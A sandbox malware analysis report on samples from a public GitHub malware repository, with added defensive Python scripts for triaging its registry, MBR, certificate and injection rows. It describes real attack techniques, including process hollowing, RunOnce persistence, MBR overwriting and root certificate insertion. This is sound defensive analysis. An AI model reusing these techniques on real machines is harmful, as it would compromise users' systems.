Malware Analysis Report

2024-10-19 10:29

Sample ID 240408-12v9yadc39
Target https://github.com/Da2dalus/The-MALWARE-Repo
Tags
modiloader netwire bootkit botnet evasion persistence ransomware rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The submitted URL https://github.com/Da2dalus/The-MALWARE-Repo was classified as: Known bad. The behavioural run below opened the repository in Microsoft Edge and then executed several different samples downloaded from it (NetWire.exe, MEMZ.exe, $uckyLocker.exe, AdwereCleaner.exe, FreeYoutubeDownloader.exe, SpySheriff.exe), so the tags, score and signatures describe the union of their behaviour rather than a single family.

Malicious Activity Summary

modiloader netwire bootkit botnet evasion persistence ransomware rat stealer trojan

NetWire RAT payload

ModiLoader, DBatLoader

Netwire

ModiLoader First Stage

Disables Task Manager via registry modification

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Modifies registry key

Suspicious use of SendNotifyMessage

Script User-Agent

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-08 22:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-08 22:09

Reported

2024-04-08 22:20

Platform

win10v2004-20240226-en

Max time kernel

436s

Max time network

460s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo

Signatures

ModiLoader, DBatLoader

trojan modiloader

NetWire RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A [4 identical events, no details recorded]

Netwire

botnet stealer netwire

ModiLoader First Stage

Description Indicator Process Target
N/A N/A N/A N/A [5 identical events, no details recorded]

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows \System32\fodhelper.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" C:\Users\Admin\Downloads\NetWire.exe N/A [2 identical events]
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
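The Run/RunOnce rows above are the ones worth pulling out of a report like this automatically: a RunOnce entry pointing at an .hta under %LOCALAPPDATA%, written by a different binary (NetWire.exe), is a stager's persistence, while the AdwCleaner entry registers the dropped copy itself. The Python below is an added example and not part of the sandbox output. It parses rows in this page's flattened "Set value (str) KEY = "DATA" PROCESS TARGET" layout (the sample rows are the three distinct rows from the table, embedded as constructed input), converts the \REGISTRY\USER\<SID> path to the HKU form, undoes the escaping the report applies to value data, and flags RunOnce keys, script-host targets, targets in user-writable locations, and autostart images that differ from the process that registered them. The flag names and the list of user-writable prefixes are this example's own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed input: the three distinct Run/RunOnce rows from the table above, kept in this
# report's flattened "Description Indicator Process Target" layout.
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" C:\Users\Admin\Downloads\NetWire.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A',
]

# Row layout: Set value (<type>) <key\valuename> = "<data>" <writing process> <target>
ROW_RE = re.compile(r'^Set value \((?P<type>\w+)\) (?P<key>.+?) = "(?P<data>.*)" (?P<process>.+) (?P<target>\S+)$')
# First path in the value data that ends in an executable or script extension.
IMAGE_RE = re.compile(r'^"?(?P<path>.+?\.(?:exe|dll|scr|hta|vbs|vbe|js|jse|wsf|bat|cmd|ps1|lnk))(?:"|\s|$)', re.I)
SCRIPT_EXT = {'hta', 'vbs', 'vbe', 'js', 'jse', 'wsf', 'bat', 'cmd', 'ps1'}
USER_WRITABLE = ('c:\\users\\', 'c:\\programdata\\', 'c:\\windows\\temp\\')  # example's own list


@dataclass
class Finding:
    key: str                 # normalised registry key, HKU\<SID>\... or HKLM\...
    value_name: str
    image: str               # autostart target extracted from the value data
    writer: str              # process that wrote the value
    flags: list = field(default_factory=list)


def normalise_key(path: str) -> str:
    """Map the kernel object path form used in the report to the HKLM/HKU form most tooling expects."""
    low = path.lower()
    for prefix, hive in (('\\registry\\machine', 'HKLM'), ('\\registry\\user', 'HKU')):
        if low.startswith(prefix + '\\'):
            return hive + path[len(prefix):]
    return path


def unescape(data: str) -> str:
    """Undo the C-style escaping (backslash before quotes, doubled backslashes) the report applies to value data."""
    return data.replace('\\"', '"').replace('\\\\', '\\')


def triage_row(row: str):
    m = ROW_RE.match(row)
    if not m:
        return None
    key, _, value_name = normalise_key(m['key']).rpartition('\\')
    data = unescape(m['data'])
    im = IMAGE_RE.match(data)
    f = Finding(key, value_name, im['path'] if im else data, m['process'])
    low = f.image.lower()
    if '\\currentversion\\runonce' in key.lower():
        f.flags.append('runonce')          # one-shot autostart, typical of a stager
    if low.rsplit('.', 1)[-1] in SCRIPT_EXT:
        f.flags.append('script_target')    # a script host (mshta, wscript, cmd) will run it
    if low.startswith(USER_WRITABLE):
        f.flags.append('user_writable')    # lives where an unprivileged user can replace it
    if low.rsplit('\\', 1)[-1] != f.writer.lower().rsplit('\\', 1)[-1]:
        f.flags.append('writer_differs')   # the dropper registered something other than itself
    return f


def triage_rows(rows):
    return [f for f in map(triage_row, rows) if f]


if __name__ == '__main__':
    for f in triage_rows(SAMPLE_ROWS):
        print(f'{f.key}\\{f.value_name} -> {f.image}  [{", ".join(f.flags) or "no flags"}]  written by {f.writer}')
```

The same parser covers Run, RunOnce and any other "Set value (str)" row on the page; the flags are deliberately cheap to compute so the function can run over every row of a report and sort the persistence entries by how many flags they carry.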

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A [3 identical events]
N/A raw.githubusercontent.com N/A N/A [5 identical events]

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Downloads\MEMZ.exe N/A
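MEMZ.exe opening \??\PhysicalDrive0 for modification is the one row here that can leave a machine unbootable, so the practical follow-up is to pull the first sector of the affected disk and diff it against a known-good copy. The Python below is an added example, not sandbox output: it decodes a 512-byte MBR (boot code, disk signature, the four partition entries and the 0x55AA boot signature) and reports what changed between a baseline and a current sector. The three sectors it works on are constructed in the block (a plausible baseline, a copy with only the boot code overwritten, and a zeroed sector); none of them is an image of the sandbox disk.

```python
import hashlib
import struct

SECTOR = 512
BOOT_CODE_END = 440   # 0..439 boot code, 440..443 disk signature, 446..509 partition table, 510..511 0x55AA


def parse_mbr(sector: bytes) -> dict:
    """Decode one 512-byte sector as a classic MBR."""
    if len(sector) != SECTOR:
        raise ValueError('an MBR is exactly 512 bytes')
    partitions = []
    for i in range(4):
        status, _chs_first, ptype, _chs_last, lba_start, count = struct.unpack_from('<B3sB3sII', sector, 446 + 16 * i)
        if ptype == 0 and lba_start == 0 and count == 0:
            continue                      # empty slot
        partitions.append({'slot': i, 'bootable': status == 0x80, 'type': ptype,
                           'lba_start': lba_start, 'sectors': count})
    return {
        'signature_ok': sector[510:512] == b'\x55\xAA',
        'disk_signature': struct.unpack_from('<I', sector, 440)[0],
        'boot_code_sha256': hashlib.sha256(sector[:BOOT_CODE_END]).hexdigest(),
        'partitions': partitions,
    }


def compare_mbr(baseline: bytes, current: bytes) -> list:
    """Differences between a known-good sector and the one read now, most serious first."""
    b, c = parse_mbr(baseline), parse_mbr(current)
    findings = []
    if not c['signature_ok']:
        findings.append('boot signature 0x55AA missing: sector is not a valid MBR')
    if b['boot_code_sha256'] != c['boot_code_sha256']:
        findings.append('boot code changed')
    if b['partitions'] != c['partitions']:
        findings.append('partition table changed')
    if b['disk_signature'] != c['disk_signature']:
        findings.append('disk signature changed')
    return findings


def build_sample_mbr(boot_code: bytes, partitions, disk_signature=0x1234ABCD) -> bytes:
    """Construct a sector for this example; it is not an image of any real disk."""
    buf = bytearray(SECTOR)
    buf[:len(boot_code)] = boot_code
    struct.pack_into('<I', buf, 440, disk_signature)
    for i, (status, ptype, lba_start, count) in enumerate(partitions):
        struct.pack_into('<B3sB3sII', buf, 446 + 16 * i, status, b'\xff\xff\xff', ptype, b'\xff\xff\xff', lba_start, count)
    buf[510:512] = b'\x55\xAA'
    return bytes(buf)


# Constructed baseline: a few plausible boot-code bytes and one bootable NTFS (0x07) partition at LBA 2048.
KNOWN_GOOD = build_sample_mbr(b'\x33\xC0\x8E\xD0\xBC\x00\x7C\x8E\xC0\x8E\xD8', [(0x80, 0x07, 2048, 1024000)])
# Constructed tampered copy: boot code replaced, partition table and signature left intact.
TAMPERED = b'\x90' * BOOT_CODE_END + KNOWN_GOOD[BOOT_CODE_END:]
# Constructed destroyed copy: the whole sector zeroed.
WIPED = b'\x00' * SECTOR

if __name__ == '__main__':
    for name, sample in (('known-good', KNOWN_GOOD), ('tampered', TAMPERED), ('wiped', WIPED)):
        print(name, compare_mbr(KNOWN_GOOD, sample) or ['no differences'])
```

To read the real sector on Windows, open \\.\PhysicalDrive0 (the Win32 name of the \??\PhysicalDrive0 object in the table) read-only from an elevated prompt and read 512 bytes, or take sector 0 of a forensic image. The baseline must come from the same machine or a matching build, since the boot code and disk signature are per-install. On a GPT disk sector 0 is only a protective MBR with a single 0xEE entry, so a changed partition table there is still significant but the real table lives in the GPT header.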

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop\Wallpaper = "0" C:\Users\Admin\Downloads\$uckyLocker.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3004 set thread context of 6532 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 1364 set thread context of 6296 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Program Files (x86)\internet explorer\ieinstal.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
File created C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A [6 identical events]

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = (binary certificate blob, not reproduced) C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A [2 identical events]
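The certificate store rows record a new key under HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates, named by SHA-1 thumbprint, with its Blob value written by 6AdwCleaner.exe; the blob bytes are not reproduced in this report. Writing under that HKLM key requires administrative rights, and AuthRoot is the store Windows uses for roots from the Microsoft Trusted Root Program, so the follow-up on a live host is to decode the Blob and identify the certificate rather than trust the key name. The Python below is an added example, not sandbox output: it walks the serialized property records Windows stores in a Blob value (little-endian DWORD property id, DWORD reserved, DWORD length, then the data), pulls out property 32 (the DER-encoded certificate), and checks that the key name matches the SHA-1 of that DER, because a key whose name does not match its contents is itself a finding. The sample blob is built in the block around a placeholder byte string standing in for a DER certificate; it is not the certificate from this detonation, and the friendly name "Example Root" is invented.

```python
import hashlib
import struct

# Property ids from wincrypt.h that matter here: 3 = SHA-1 hash, 11 = friendly name, 32 = the DER certificate.
CERT_SHA1_HASH_PROP_ID = 3
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32


def parse_cert_blob(blob: bytes) -> dict:
    """Walk the serialized records: DWORD prop_id, DWORD reserved (observed as 1), DWORD length, then the data."""
    props, off = {}, 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f'truncated record header at offset {off}')
        prop_id, _reserved, length = struct.unpack_from('<III', blob, off)
        off += 12
        if off + length > len(blob):
            raise ValueError(f'record {prop_id} runs past the end of the blob')
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def thumbprint(der: bytes) -> str:
    """Windows names each certificate key after the SHA-1 of the DER encoding, upper-case hex."""
    return hashlib.sha1(der).hexdigest().upper()


def check_cert_key(key_name: str, blob: bytes) -> dict:
    """Decode the Blob and verify the key name against the certificate it actually contains."""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        return {'ok': False, 'reason': 'no certificate record (property 32) in blob'}
    tp = thumbprint(der)
    stored = props.get(CERT_SHA1_HASH_PROP_ID)
    friendly = props.get(CERT_FRIENDLY_NAME_PROP_ID, b'').decode('utf-16-le', 'replace').rstrip('\x00')
    return {
        'ok': tp == key_name.upper() and (stored is None or stored.hex().upper() == tp),
        'thumbprint': tp,
        'key_name': key_name.upper(),
        'friendly_name': friendly,
        'der_length': len(der),
    }


def build_blob(records) -> bytes:
    """Serialize (prop_id, data) pairs in the same layout; used here only to construct the sample below."""
    out = bytearray()
    for prop_id, data in records:
        out += struct.pack('<III', prop_id, 1, len(data)) + data
    return bytes(out)


# Constructed sample. FAKE_DER is a placeholder byte string standing in for a DER certificate; it is not
# the certificate this detonation installed (the report does not reproduce those bytes).
FAKE_DER = b'\x30\x82\x01\x00' + b'example-not-a-real-certificate' * 4
SAMPLE_BLOB = build_blob([
    (CERT_FRIENDLY_NAME_PROP_ID, 'Example Root\x00'.encode('utf-16-le')),
    (CERT_SHA1_HASH_PROP_ID, hashlib.sha1(FAKE_DER).digest()),
    (CERT_CERT_PROP_ID, FAKE_DER),
])
SAMPLE_KEY_NAME = thumbprint(FAKE_DER)

if __name__ == '__main__':
    print(check_cert_key(SAMPLE_KEY_NAME, SAMPLE_BLOB))
    # The thumbprint from this report's AuthRoot key cannot match the constructed sample certificate.
    print(check_cert_key('02FAF3E291435468607857694DF5E45B68851868', SAMPLE_BLOB)['ok'])
```

On a live system the bytes come from reg query or Get-ItemProperty on that key, or from an exported SOFTWARE hive; certutil -store AuthRoot shows the same store already decoded. Once you have the DER, any X.509 parser gives you the subject and validity, and that, not the mere presence of a write, decides whether the AdwCleaner-named installer added a root it should not have.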

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A [4 identical events]

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A [3 identical events]
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A [61 identical events]

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A [3 identical events]
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Downloads\MEMZ.exe N/A [2 identical events]

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A [6 identical events]
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A [8 identical events]
N/A N/A C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe N/A
N/A N/A C:\Users\Admin\Downloads\MEMZ.exe N/A [49 identical events]

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe [42 identical events, interleaved with the row below]
PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe [22 identical events]
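The SetThreadContext and WriteProcessMemory tables are raw per-call rows, but read together they describe two parallel chains: NetWire.exe (PID 4924) writes into a second NetWire.exe (PID 1364), which then sets the thread context of ieinstal.exe (PID 6296); PID 3556 does the same through 3004 into ieinstal.exe 6532. Writes into a child followed by SetThreadContext on a process running a different, legitimate Microsoft image is the pattern of process hollowing, consistent with the NetWire payload running inside ieinstal.exe. The Python below is an added example, not sandbox output: it parses rows in the wording used in these two tables (the sample input is the rows above, with the 42 and 22 repeated write rows reproduced by repetition), collapses identical rows into per-edge counts, and joins writer, intermediate and target PIDs into chains, flagging those where the final image differs from the injector's. The field names are this example's choices.

```python
import re
from collections import defaultdict

# Constructed input: the rows of the two tables above in the report's own wording. The report prints one
# line per API call; the repetition here reproduces that (42 and 22 identical write rows, two context rows).
SAMPLE_ROWS = (
    [r'PID 4924 wrote to memory of 1364 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe'] * 42
    + [r'PID 3556 wrote to memory of 3004 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Users\Admin\Downloads\NetWire.exe'] * 22
    + [r'PID 3004 set thread context of 6532 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Program Files (x86)\internet explorer\ieinstal.exe',
       r'PID 1364 set thread context of 6296 N/A C:\Users\Admin\Downloads\NetWire.exe C:\Program Files (x86)\internet explorer\ieinstal.exe']
)

# "PID <src> <action> <dst> <indicator> <process path> <target path>". Both paths start with a drive
# letter, which is what lets the lazy match split them even though the target path contains spaces.
ROW_RE = re.compile(r'^PID (?P<src>\d+) (?P<action>wrote to memory of|set thread context of) (?P<dst>\d+) '
                    r'(?P<indicator>\S+) (?P<process>[A-Za-z]:\\.+?) (?P<target>[A-Za-z]:\\.+|N/A)$')


def aggregate(rows):
    """Collapse rows into edges keyed by (src pid, dst pid, action), keeping a count and both image paths."""
    edges = {}
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        key = (int(m['src']), int(m['dst']), m['action'])
        edge = edges.setdefault(key, {'count': 0, 'src_image': m['process'], 'dst_image': m['target']})
        edge['count'] += 1
    return edges


def injection_chains(edges):
    """Join A -wrote to-> B with B -set thread context of-> C into (A, B, C) chains."""
    writes, contexts = defaultdict(list), defaultdict(list)
    for (src, dst, action), edge in edges.items():
        (writes if action.startswith('wrote') else contexts)[src].append((dst, edge))
    chains = []
    for writer, targets in writes.items():
        for stager, w in targets:
            for victim, c in contexts.get(stager, []):
                chains.append({
                    'writer': writer, 'stager': stager, 'victim': victim,
                    'write_count': w['count'],
                    'stager_image': w['dst_image'], 'victim_image': c['dst_image'],
                    # a context set on a process running a different image than the setter is the hollowing tell
                    'cross_image': w['dst_image'].lower() != c['dst_image'].lower(),
                })
    return sorted(chains, key=lambda ch: (ch['writer'], ch['stager'], ch['victim']))


def orphan_context_sets(edges):
    """SetThreadContext edges whose source was never written into: still worth listing, just unlinked."""
    written_to = {dst for (_, dst, action) in edges if action.startswith('wrote')}
    return [(src, dst) for (src, dst, action) in edges if action.startswith('set') and src not in written_to]


if __name__ == '__main__':
    edges = aggregate(SAMPLE_ROWS)
    for ch in injection_chains(edges):
        print(f"{ch['writer']} -> {ch['stager']} ({ch['write_count']} writes) -> {ch['victim']} [{ch['victim_image']}]"
              f"{' cross-image' if ch['cross_image'] else ''}")
    print('unlinked SetThreadContext sources:', orphan_context_sets(edges))
```

The join is deliberately by PID only, because that is all these tables give; on endpoint telemetry you would key on process GUIDs instead, since PIDs are reused within a long detonation.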

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=4852 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5704 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5864 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5532 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5224 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=4100 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6120 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=6188 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6696 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4476 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\$uckyLocker.exe

"C:\Users\Admin\Downloads\$uckyLocker.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=6552 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6692 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5500 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Users\Admin\Downloads\NetWire.exe

"C:\Users\Admin\Downloads\NetWire.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4b4 0x33c

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=6208 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=6172 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

